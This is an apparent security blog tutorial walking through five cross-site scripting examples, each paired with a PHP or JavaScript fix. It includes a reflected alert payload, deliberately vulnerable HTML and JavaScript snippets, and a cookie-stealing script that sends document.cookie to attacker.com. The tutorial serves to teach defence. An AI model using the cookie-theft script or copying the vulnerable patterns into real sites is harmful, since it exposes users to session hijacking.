For definition, remediation and more examples on XSS please visit the entry: https://www.girlscanhack.com/post/xssploited-how-cross-site-scripting-can-leave-your-web-app-vulnerable
Here are 5 practical examples of Cross-Site Scripting
Reflected XSS via URL parameter
(PHP)
http://example.com/search?q=<script>alert("XSS");</script>
In this example, the q parameter in the URL is vulnerable to a reflected XSS attack. The attacker injects a script that displays an alert box with the text "XSS" when the victim clicks on the link.
To fix this, you should validate and sanitize user input on the server-side. In this case, you should escape any special characters that could be used to inject scripts into the HTML. You can use an HTML encoding library, like htmlspecialchars(), to do this.
$q = htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');
Stored XSS in comment section
(HTML)
<div class="comment-section">
<p>Leave a comment:</p>
<textarea id="comment"></textarea>
<button onclick="submitComment()">Submit</button>
</div>
In this example, the textarea field is vulnerable to a stored XSS attack. An attacker could inject a script into the comment field, which would be stored on the server and executed in the victim's browser when they view the comment section.
To fix this, you should sanitize user input before storing it on the server-side. You can use a library like htmlpurifier to remove any malicious scripts and tags from the user's input.
(PHP)
require_once 'htmlpurifier-4.12.0/library/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
$comment = $purifier->purify($_POST['comment']);
DOM-based XSS via JavaScript
(HTML)
<script>
var searchResults = document.getElementById("search-results");
var searchTerm = window.location.search.replace("?q=", "");
searchResults.innerHTML = "<h2>Search results for: " + searchTerm + "</h2>";
</script>
In this example, the searchTerm variable is vulnerable to a DOM-based XSS attack. If an attacker is able to inject a script into the q parameter in the URL, it will be executed when the JavaScript code modifies the content of the searchResults element.
To fix this, you should use proper input validation and sanitization techniques to prevent user input from being able to execute scripts. You can use regular expressions or input validation libraries to ensure that the input is safe.
(Javascript)
var searchTerm = window.location.search.replace("?q=", "");
if (/^[a-zA-Z0-9]+$/.test(searchTerm)) {
searchResults.innerHTML = "<h2>Search results for: " + searchTerm + "</h2>";
} else {
searchResults.innerHTML = "<p>Invalid search term.</p>";
}
Stored XSS in form field
(HTML)
<form action="https://example.com/login" method="post">
<label for="username">Username:</label>
<input type="text" id="username" name="username">
<label for="password">Password:</label>
<input type="password" id="password" name="password">
<button type="submit">Login</button>
</form>
In this example, the username field is vulnerable to a stored XSS attack. An attacker could inject a script into the username field, which would be stored on the server and executed in the victim's browser when they log in.
To fix this, you should escape and sanitize user input before storing it on the server-side. You can use an HTML encoding library, like htmlspecialchars(), to do this
(PHP)
$username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8');
Session hijacking via cookie stealing
(HTML) <script>
var cookie = document.cookie;
var attackerURL = "http://attacker.com/steal.php?cookie=" + cookie;
var img = new Image();
img.src = attackerURL;
</script>
In this example, an attacker injects a script into a vulnerable website that steals the victim's session cookie. The script creates an image object with the URL of the attacker's server and the victim's session cookie as a parameter. When the victim's browser loads the image, the session cookie is sent to the attacker's server, allowing them to hijack the victim's session.
To fix this, you should use secure cookies and HTTPS to prevent session hijacking attacks. You can set the HttpOnly and Secure flags on cookies to prevent them from being accessed by scripts and to ensure that they are only transmitted over secure connections.
(PHP)
session_set_cookie_params(0, '/', '', true, true);
session_start();